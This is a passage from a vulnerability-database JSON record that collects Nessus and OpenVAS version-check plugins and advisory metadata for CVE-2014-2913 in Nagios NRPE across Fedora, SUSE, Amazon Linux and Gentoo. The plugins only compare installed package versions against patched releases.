script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2015/10/19 22:32:19 $\");\n\n script_cve_id(\"CVE-2014-2913\");\n script_bugtraq_id(66969);\n script_xref(name:\"FEDORA\", value:\"2014-5897\");\n\n script_name(english:\"Fedora 20 : nrpe-2.15-2.fc20 (2014-5897)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Add patch to mitigate CVE-2014-2913\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1089878\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-November/144631.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?13795117\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected nrpe package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:U/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:nrpe\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"nrpe-2.15-2.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"nrpe\");\n}\n", "title": "Fedora 20 : nrpe-2.15-2.fc20 (2014-5897)", "type": "nessus", "viewCount": 3}, "differentElements": ["description"], "edition": 5, "lastseen": "2019-01-16T20:20:14"}], "edition": 6, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "57030998dbf24cdc7c9a14b101c40e97"}, {"key": "cvelist", "hash": "b733fbefa3f6c0732250b689cea72888"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "b0e03d2bc131e4ba82b59310377f2b51"}, {"key": "href", "hash": "88c725539d614055130db5977db76466"}, {"key": "modified", "hash": "9a00910eeedb8c835c4637a953896665"}, {"key": "naslFamily", "hash": "be931514784f88df80712740ad2723e7"}, {"key": "pluginID", "hash": "4f68e485747d6888e3cdf7a78eef798c"}, {"key": "published", "hash": "e1915c9da670387350f800c5b325e9f2"}, {"key": "references", "hash": "f43fde25caf6a2a838a85e41eb9158dd"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "3d8d71ec757394472b6c007e6438a87b"}, {"key": "title", "hash": "2650b552e6a3dacd1de9893c7ec853fa"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "56982e83019e84e363dfbeabd121f284a9f186cbf699b679134172a95c36b5d6", "viewCount": 5, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-2913"]}, {"type": "amazon", "idList": ["ALAS-2014-364"]}, {"type": "seebug", "idList": ["SSV:87224"]}, {"type": "zdt", "idList": ["1337DAY-ID-22565"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:128038"]}, {"type": "nessus", "idList": ["FEDORA_2015-15398.NASL", "NAGIOS_NRPE_COMMAND_ARGUMENT_PROCESSING.NASL", "SUSE_11_NAGIOS-NRPE-140506.NASL", "FEDORA_2014-5896.NASL", "ALA_ALAS-2014-364.NASL", "SUSE_11_NAGIOS-NRPE-140507.NASL", "OPENSUSE-2014-335.NASL", "GENTOO_GLSA-201408-18.NASL"]}, {"type": "suse", "idList": ["SUSE-SU-2014:0682-1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310850793", "OPENVAS:1361412562310868498", "OPENVAS:1361412562310868557", "OPENVAS:1361412562310120139", "OPENVAS:1361412562310121262"]}, {"type": "exploitdb", "idList": ["EDB-ID:34461", "EDB-ID:32925"]}, {"type": "gentoo", "idList": ["GLSA-201408-18"]}], "modified": "2019-02-21T01:22:50"}, "score": {"value": 5.0, "vector": "NONE"}, "vulnersScore": 5.0}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-5897.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79346);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2015/10/19 22:32:19 $\");\n\n script_cve_id(\"CVE-2014-2913\");\n script_bugtraq_id(66969);\n script_xref(name:\"FEDORA\", value:\"2014-5897\");\n\n script_name(english:\"Fedora 20 : nrpe-2.15-2.fc20 (2014-5897)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Add patch to mitigate CVE-2014-2913\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1089878\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-November/144631.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?13795117\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected nrpe package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:U/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:nrpe\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"nrpe-2.15-2.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"nrpe\");\n}\n", "naslFamily": "Fedora Local Security Checks", "pluginID": "79346", "cpe": ["cpe:/o:fedoraproject:fedora:20", "p-cpe:/a:fedoraproject:fedora:nrpe"], "scheme": null}

{"cve": [{"lastseen": "2018-11-01T05:14:33", "bulletinFamily": "NVD", "description": "** DISPUTED ** Incomplete blacklist vulnerability in nrpe.c in Nagios Remote Plugin Executor (NRPE) 2.15 and earlier allows remote attackers to execute arbitrary commands via a newline character in the -a option to libexec/check_nrpe. NOTE: this issue is disputed by multiple parties. It has been reported that the vendor allows newlines as \"expected behavior.\" Also, this issue can only occur when the administrator enables the \"dont_blame_nrpe\" option in nrpe.conf despite the \"HIGH security risk\" warning within the comments.", "modified": "2018-10-30T12:27:34", "published": "2014-05-07T06:55:06", "id": "CVE-2014-2913", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2913", "title": "CVE-2014-2913", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2018-11-19T13:03:15", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2015-10-13T00:00:00", "id": "OPENVAS:1361412562310850793", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850793", "title": "SuSE Update for nagios-nrpe, SUSE-SU-2014:0682-1 (nagios-nrpe, )", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2014_0682_1.nasl 12381 2018-11-16 11:16:30Z cfischer $\n#\n# SuSE Update for nagios-nrpe, SUSE-SU-2014:0682-1 (nagios-nrpe,)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850793\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-10-13 18:35:00 +0530 (Tue, 13 Oct 2015)\");\n script_cve_id(\"CVE-2014-2913\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SuSE Update for nagios-nrpe, SUSE-SU-2014:0682-1 (nagios-nrpe, )\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'nagios-nrpe.'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"nagios-nrpe has been updated to prevent possible remote command execution\n when command arguments are enabled. This issue affects versions 2.15 and\n older.\n\n These security issues have been fixed:\n\n * Remote command execution (CVE-2014-2913)\");\n\n script_xref(name:\"URL\", value:\"http://seclists.org/fulldisclosure/2014/Apr/240\");\n\n script_tag(name:\"affected\", value:\"nagios-nrpe, on SUSE Linux Enterprise Server 11 SP3\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"SUSE-SU\", value:\"2014:0682_1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLES11\\.0SP3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\nres = \"\";\n\nif(release == \"SLES11.0SP3\")\n{\n\n if ((res = isrpmvuln(pkg:\"nagios-nrpe\", rpm:\"nagios-nrpe~2.12~24.4.10.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nagios-nrpe-doc\", rpm:\"nagios-nrpe-doc~2.12~24.4.10.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nagios-plugins-nrpe\", rpm:\"nagios-plugins-nrpe~2.12~24.4.10.1\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-03-18T14:38:23", "bulletinFamily": "scanner", "description": "Check the version of nrpe", "modified": "2019-03-15T00:00:00", "published": "2014-11-20T00:00:00", "id": "OPENVAS:1361412562310868498", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868498", "title": "Fedora Update for nrpe FEDORA-2014-5897", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for nrpe FEDORA-2014-5897\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868498\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-11-20 06:42:15 +0100 (Thu, 20 Nov 2014)\");\n script_cve_id(\"CVE-2014-2913\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for nrpe FEDORA-2014-5897\");\n script_tag(name:\"summary\", value:\"Check the version of nrpe\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"nrpe on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-5897\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-November/144631.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"nrpe\", rpm:\"nrpe~2.15~2.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-03-18T14:38:29", "bulletinFamily": "scanner", "description": "Check the version of nrpe", "modified": "2019-03-15T00:00:00", "published": "2014-12-08T00:00:00", "id": "OPENVAS:1361412562310868557", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868557", "title": "Fedora Update for nrpe FEDORA-2014-5896", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for nrpe FEDORA-2014-5896\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868557\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-12-08 06:21:34 +0100 (Mon, 08 Dec 2014)\");\n script_cve_id(\"CVE-2014-2913\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for nrpe FEDORA-2014-5896\");\n script_tag(name:\"summary\", value:\"Check the version of nrpe\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"nrpe on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2014-5896\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-December/145738.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"nrpe\", rpm:\"nrpe~2.15~2.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-02T14:33:07", "bulletinFamily": "scanner", "description": "Amazon Linux Local Security Checks", "modified": "2018-10-01T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120139", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120139", "title": "Amazon Linux Local Check: ALAS-2014-364", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: alas-2014-364.nasl 6663 2017-07-11 09:58:05Z teissa$\n#\n# Amazon Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@iki.fi>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120139\");\n script_version(\"$Revision: 11703 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:18:26 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-01 10:05:31 +0200 (Mon, 01 Oct 2018) $\");\n script_name(\"Amazon Linux Local Check: ALAS-2014-364\");\n script_tag(name:\"insight\", value:\"** DISPUTED ** Incomplete blacklist vulnerability in nrpe.c in Nagios Remote Plugin Executor (NRPE) 2.15 and earlier allows remote attackers to execute arbitrary commands via a newline character in the -a option to libexec/check_nrpe. NOTE: this issue is disputed by multiple parties. It has been reported that the vendor allows newlines as expected behavior. Also, this issue can only occur when the administrator enables the dont_blame_nrpe option in nrpe.conf despite the HIGH security risk warning within the comments.\");\n script_tag(name:\"solution\", value:\"Run yum update nrpe to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2014-364.html\");\n script_cve_id(\"CVE-2014-2913\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"nagios-plugins-nrpe\", rpm:\"nagios-plugins-nrpe~2.15~2.7.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"nrpe-debuginfo\", rpm:\"nrpe-debuginfo~2.15~2.7.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"nrpe\", rpm:\"nrpe~2.15~2.7.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-29T12:40:38", "bulletinFamily": "scanner", "description": "Gentoo Linux Local Security Checks GLSA 201408-18", "modified": "2018-10-26T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310121262", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121262", "title": "Gentoo Security Advisory GLSA 201408-18", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201408-18.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121262\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:27:49 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201408-18\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in NRPE. Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201408-18\");\n script_cve_id(\"CVE-2013-1362\", \"CVE-2014-2913\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201408-18\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"net-analyzer/nrpe\", unaffected: make_list(\"ge 2.15\"), vulnerable: make_list(\"lt 2.15\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-02-21T01:22:58", "bulletinFamily": "scanner", "description": "Add patch to mitigate CVE-2014-2913\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2015-10-19T00:00:00", "id": "FEDORA_2014-5896.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=79793", "published": "2014-12-07T00:00:00", "title": "Fedora 19 : nrpe-2.15-2.fc19 (2014-5896)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 